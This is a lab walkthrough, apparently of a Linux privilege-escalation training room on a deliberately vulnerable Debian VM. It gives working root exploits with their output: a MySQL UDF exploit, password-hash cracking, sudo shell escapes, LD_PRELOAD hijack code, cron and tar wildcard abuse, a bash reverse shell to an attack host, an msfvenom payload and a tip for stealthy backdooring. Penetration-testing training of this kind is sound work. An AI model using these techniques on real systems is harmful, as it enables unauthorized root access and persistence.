This room explains some common methods of escalating privileges on Linux systems. This serves as a good place to start if you are stuck as a certain user and need to either upgrade or step laterally to another user.
Task 1 – Deploy the Vulnerable Debian VM
-
Login credentials:
USER: user
PASS: password321
Run the 'id' command. What is the result?
Task 2 – Service Exploits
MySQL is running as "root" and the root user on MySQL does not have a password set. We can use a popular exploit that takes use of User Defined Functions (UDFs) to run system commands as root via the MySQL service.
-
Change into the
/home/user/tools/mysql-udf
directory -
Compile the
raptor_udf2.c
exploit using the following commands:
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
- Connect to the MySQL service as root, password is blank:
mysql -u root
- Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
- Use the below command to copy /bin/bash to /tmp/rootbash and set the SUID permissions:
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
- Exit out of MySQL (type
exit
or\q
and press Enter) then run the SUID bash copy/tmp/rootbash
with the parameter-p
to gain a shell running with root privileges:
/tmp/rootbash -p
The exploit!
user@debian:~$ cd /home/user/tools/mysql-udf
user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
<g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2. <g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
user@debian:~/tools/mysql-udf$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.73-1+deb6u1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.27 sec)
mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
+------------------------------------------------------------------+
| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
+------------------------------------------------------------------+
| 0 |
+------------------------------------------------------------------+
1 row in set (0.01 sec)
mysql> /q
user@debian:~$ /tmp/rootbash -p
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)
Task 3 – Weak File Permissions – Readable /etc/shadow
An /etc/shadow
file that is world-readable is dangerous… the /etc/shadow
file is where Linux stores it’s users and passwords (which are encrypted). Because the passwords are encrypted, doesn’t mean that we cannot break them… especially if the user has used a simple password…
- The
/etc/shadow
file contains user password hashes and is usually readable only by root… note that on this VM it is world-readable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
- View the contents of the
/etc/shadow
file:
user@debian:~/tools/mysql-udf$ cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::
Each line represents a user. A user’s password hash (if they have one) can be found between the first and second colons (:
) of each line.
- Save the root users hash to a file called
hash.txt
and use John The Ripper to crack it withrockyou.txt
– the famous plaintext list of passwords with over 14 million commonly used passwords:
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (root)
1g 0:00:00:01 DONE (2021-11-24 16:57) 0.8547g/s 1312p/s 1312c/s 1312C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
- Switch to the root user, using the cracked password:
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#
What is the root user's password hash?
What hashing algorithm was used to produce the root user's password hash?
What is the root user's password?
Task 4 – Weak File Permissions – Writeable /etc/shadow
As much as an /etc/shadow
file that is world-readable is dangerous… an /etc/shadow
file that is world-writeable is 100x worse… this allows ANYONE with access to modify ANY passwords stored in this file. In 3 easy steps we can overwite the root
users password with whatever we want, and no one would be the wiser (until someone tries to access that root
account with the old password anyway…)
- The
/etc/shadow
file on this VM is word-writeable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
- Generate a new password hash with a password of your choice:
user@debian:~/tools/mysql-udf$ mkpasswd -m sha-512 pwn3d
$6$w1DLfTWkp2iep$P1rdUJ.aGUsX1v66DRwjMI.HKipURmgJ9rq7uQcKhRFZPzDtHgIU7yE09YbWPicDffVyW8AVx/y20xHvAnLxO0
- Edit the
/etc/shadow
file and replace the originalroot
hash with the one generated above, then switch toroot
:
user@debian:~/tools/mysql-udf$ vi /etc/shadow
"/etc/shadow" 24L, 842C written
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#
Task 5 – Weak File Permissions – Writeable /etc/passwd
The /etc/passwd
file contains information about user accounts. It is world-readable by default, but is usually only writeable by root. Historically, the /etc/passwd
file contained the users password hashes, and some versions of Linux still allow password hashes to be stored there.
- Note that the
/etc/passwd
file is world-writeable:
user@debian:~/tools$ ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
- Generate a new password hash with a password of your choice:
user@debian:~/tools$ openssl passwd l33t
XlfiGiQKUvlVE
- Edit the
/etc/shadow
file and either replace thex
between the first and second colon on the root account line, or better still copy the whole line to the bottom of the file, changeroot
to something else and paste the generated password between the first and second colons:
stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash
"/etc/passwd" 25L, 1055C written
user@debian:~/tools$ su stimpz
Password:
root@debian:/home/user/tools# id
uid=0(root) gid=0(root) groups=0(root)
Run the 'id' command as the newroot user. What is the result?
Task 6 – Sudo – Shell Escape Sequences
- List the programs which sudo allows your user to run:
user@debian:~/tools$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
- Use GTFOBins and search for the program names, if the program is listed with "sudo" as a function, you can use it to elevate privileges, usually via an escape sequence.
For an extra challenge, try to gain a root shell using all the programs on the list!
iftop
user@debian:~$ sudo iftop
interface: eth0
IP address is: 10.10.127.35
MAC address is: 02:2c:1a:3c:85:ff
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
find
user@debian:~$ sudo find . -exec /bin/bash \; -quit
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
nano
user@debian:~$ sudo nano
Ctrl-R / Ctrl-X
reset; bash 1>&0 2>&0
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
vim
user@debian:~$ sudo vim -c ':!/bin/bash'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
man
user@debian:~$ sudo man man
!/bin/bash
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)
awk
user@debian:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
less
user@debian:~$ sudo less /etc/profile
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
ftp
user@debian:~$ sudo ftp
ftp> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
nmap
user@debian:~$ sudo nmap --interactive
Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
/bin/more
user@debian:~$ TERM= sudo more /etc/profile
!/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: the
apache2
sudo method is covered in the topic below, it’s not your usual standard shell escape GTFOBins-style exploit.
How many programs is 'user' allowed to run via sudo?
One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
Task 7 – Sudo – Environment Variables
Sudo can be configured to inherit certain environment variables from the user’s environment.
- Check which environment variables are inherited (look for the
env_keep
options):
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
LD_PRELOAD
and LD_LIBRARY_PATH
are both inherited from the user’s environment. LD_PRELOAD
loads a shared object before any others when a program is run. LD_LIBRARY_PATH
provides a list of directories where shared libraries are searched for first.
- Create a shared object using the code located at
/home/user/tools/sudo/preload.c
:
user@debian:~$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
user@debian:~$
- Run one of the programs you are allowed to run via sudo, while setting the
LD_PRELOAD
environment variable to the full path of the new shared object:
user@debian:~$ sudo LD_PRELOAD=/tmp/preload.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
- Run
ldd /usr/sbin/apache2
:
user@debian:~$ ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fffe3bb4000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fd7c7843000)
libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fd7c761f000)
libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fd7c73e5000)
libpthread.so.0 => /lib/libpthread.so.0 (0x00007fd7c71c9000)
libc.so.6 => /lib/libc.so.6 (0x00007fd7c6e5d000)
libuuid.so.1 => /lib/libuuid.so.1 (0x00007fd7c6c58000)
librt.so.1 => /lib/librt.so.1 (0x00007fd7c6a50000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fd7c6819000)
libdl.so.2 => /lib/libdl.so.2 (0x00007fd7c6614000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fd7c63ec000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd7c7d00000)
- Create a shared object with the same name as one of the listed libraries (
libcrypt.so.1
) using the code located at/home/user/tools/sudo/library_path.c
:
user@debian:~$ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
user@debian:~$
- Run apache2 using sudo, while settings the
LD_LIBRARY_PATH
environment variable to/tmp
(where we output the compiled shared object):
user@debian:~$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
A root shell should spawn.
- Try renaming
/tmp/libcrypt.so.1
to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how thelibrary_path.c
code could be changed to make it work.
user@debian:~/tools/sudo$ mv /tmp/libcrypt.so.1 /tmp/libpcre.so.3
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: symbol lookup error: apache2: undefined symbol: pcre_free
user@debian:~/tools/sudo$ mv /tmp/libpcre.so.3 /tmp/libuuid.so.1
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libuuid.so.1: no version information available (required by /usr/lib/libapr-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
SOURCE >> library_path.c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
SOURCE >> preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
Task 8 – Cron Jobs – File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab
.
- View the contents of the system-wide crontab:
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
There should be two cron jobs scheduled to run every minute. One runs overwrite.sh
, the other runs /usr/local/bin/compress.sh
- Locate the full path of the
overwrite.sh
file:
user@debian:~$ locate overwrite.sh
/usr/local/bin/overwrite.sh
- Note that the file is world-writeable:
user@debian:~$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
- Replace the contents over the
overwrite.sh
file with the following, change the IP to the VPN IP and port to match – open up a netcat listener on your attackbox using the port given below:
user@debian:/usr/local/bin$ echo '#!/bin/bash' > overwrite.sh
user@debian:/usr/local/bin$ echo 'bash -i >& /dev/tcp/10.9.2.201/1337 0>&1' >> overwrite.sh
user@debian:/usr/local/bin$ cat overwrite.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.2.201/1337 0>&1
user@debian:/usr/local/bin$
❯ nc -lnvp 1337
Connection from 10.10.200.127:34634
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)
NOTE: Skipping that first
echo
command will instead of clearing the file out, leave the original code in the file… this would make it "less obvious" something has been backdoored, and is the preferred method of sneaking in a backdoor in real-life circumstances. This is especially the case when using the above command to spawn a shell, as it will stop the script from running any further until that shell dies. This task however directly specifies to "Replace the contents", so in that circumstance you must include that firstecho
to overwrite the contents of the file.
Task 9 – Cron Jobs – PATH Environment Variable
- View the contents of the system-wide crontab
/etc/crontab
:
user@debian:/usr/local/bin$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
- Notice the
PATH
includes the directory/home/user
at the front? Because the line callingoverwrite.sh
does not have a path we can create our own maliciousoverwrite.sh
and drop it in our home folder (which comes before the full path ofoverwrite.sh
which is/usr/local/bin
, hence it will run our script first)!
user@debian:~$ echo '#!/bin/bash' > ~/overwrite.sh
user@debian:~$ echo 'cp /bin/bash /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ echo 'chmod +xs /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls /tmp/rootbash
ls: cannot access /tmp/rootbash: No such file or directory
...
user@debian:~$ ls -l /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 03:20 /tmp/rootbash
- Now to get a root shell, simply run
/tmp/rootbash -p
:
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
What is the value of the PATH variable in /etc/crontab?
Task 10 – Cron Jobs – Wildcards
- Let’s look at the other cron job script,
compress.sh
:
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
Notice the *
(wildcard) at the end of the tar
command?
Let’s take a look at GTFOBins page for tar
: https://gtfobins.github.io/gtfobins/tar/
Tar has command line options that let you run other commands as part of a "checkpoint" feature.
- Lets cook up a shell in
msfvenom
, then runnc
to listen to the port we set:
❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f elf -o linl33t
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: linl33t
❯ nc -lnvp 1337
- Transfer it to the
/home/user
("users"
home directory) via scp:
❯ scp -oHostKeyAlgorithms=+ssh-rsa linl33t user@10.10.200.127:~
user@10.10.200.127's password:
linl33t 100% 194 0.6KB/s 00:00
- On the target box, lets not forget to make it executable!:
user@debian:~$ chmod +x linl33t
user@debian:~$
- Now we will create two files in
/home/user
that match the command syntax tar would expect from it’s command line switches, to runlinl33t
(our MSFvenom reverse shell):
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=linl33t
- … and magically, back on our attack box:
❯ nc -lnvp 1337
Connection from 10.10.200.127:34644
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
hostname
debian
Task 11 – SUID / SGID Executables – Known Exploits
- Find all SUID / SGID executables:
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
-rwsr-sr-x 1 root root 926536 Nov 24 03:55 /tmp/rootbash
-rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
/usr/sbin/exim-4.84-4
is in the above list – this version is exploitable! A local privilege escalation exploit to be exact! (included in /home/user/tools/suid/exim/
named cve-2016-1531.sh
).
- Lets exploit it! 😉
user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# /bin/bash
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root)
root@debian:~#
Task 12 – SUID / SGID Executables – Shared Object Injection
From the previous search, we also have /usr/local/bin/suid-so
– this is vulnerable to a shared object injection.
- First, execute the file and note that currently it displays a progress bar before exiting:
user@debian:~$ suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.
user@debian:~$
- Run
strace
on the file and search the output for open/access calls, and for "no such file" errors:
user@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Looking at the bottom line – it looks like suid-so
looks for a file named libcalc.so
in /home/user/.config/
(our home directory!)
- Using the example shared object code in
/home/user/tools/suid/
namedlibcalc.c
(which simply calls a Bash shell), lets compile the code into a shared object at the location we found fromsuid-so
above, and see what happens when we runsuid-so
now:
user@debian:~$ mkdir .config
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
user@debian:~$ suid-so
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SOURCE >> libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
Task 13 – SUID / SGID Executables – Environment Variables
Still looking into the available SUID/SGID binaries list we got from Task 11, we have another exploitable binary, /usr/local/bin/suid-env
– this inherits the users PATH
environment variable and is attempting to execute programs without a full path – this one is ripe for the picking!
- First, lets run it and see what it is trying to do:
user@debian:~/tools/sudo$ suid-env
[....] Starting web server: apache2httpd (pid 1680) already running
. ok
- OK… lets dig a bit deeper using strings:
user@debian:~/tools/sudo$ strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
service apache2 start
- The last line –
service apache2 start
is not pointing to the full path ofservice
(/usr/sbin/service
) – lets compile some code from our home directory, that simply spawns a Bash shell, ironically (or not) calledservice.c
… do you see where this is going yet? 🙂
user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$
- OK – now it’s showtime! 🙂
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SOURCE >> service.c
int main() {
setuid(0);
system("/bin/bash -p");
}
Task 14 – SUID / SGID Executables – Abusing Shell Features (#1)
NOTE: This will not work on Bash versions above 4.2-048.
- While still looking into the available SUID/SGID binaries list we got from Task 11, we also see
/usr/local/bin/suid-env2
– this executable is identical tosuid-env
except it uses the absolute path of theservices
:
user@debian:~$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start
In Bash versions below 4.2-048
it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
- Let’s check our Bash version:
user@debian:~$ /bin/bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
user@debian:~$
- Yipee! Let’s create a bash function with the name "/usr/sbin/service" that creates a new Bash shell (using
-p
to preserve the root permissions) and export the function, then we runsuid-env2
again and voila! 😉
user@debian:~$ function /usr/sbin/service { /bin/bash -p; }
user@debian:~$ export -f /usr/sbin/service
user@debian:~$ suid-env2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
Task 15 – SUID / SGID Executables – Abusing Shell Features (#2)
NOTE: This will not work on Bash versions 4.4 and above.
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
- Run the
/usr/local/bin/suid-env2
executable with Bash debugging enabled, and the PS4 variable set to an embedded command that will create an SUID version of/bin/bash
:
user@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1680) already running
.
user@debian:~$ ls -al /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 05:03 /tmp/rootbash
- Then as before, it’s as simple as running this, and we are root!
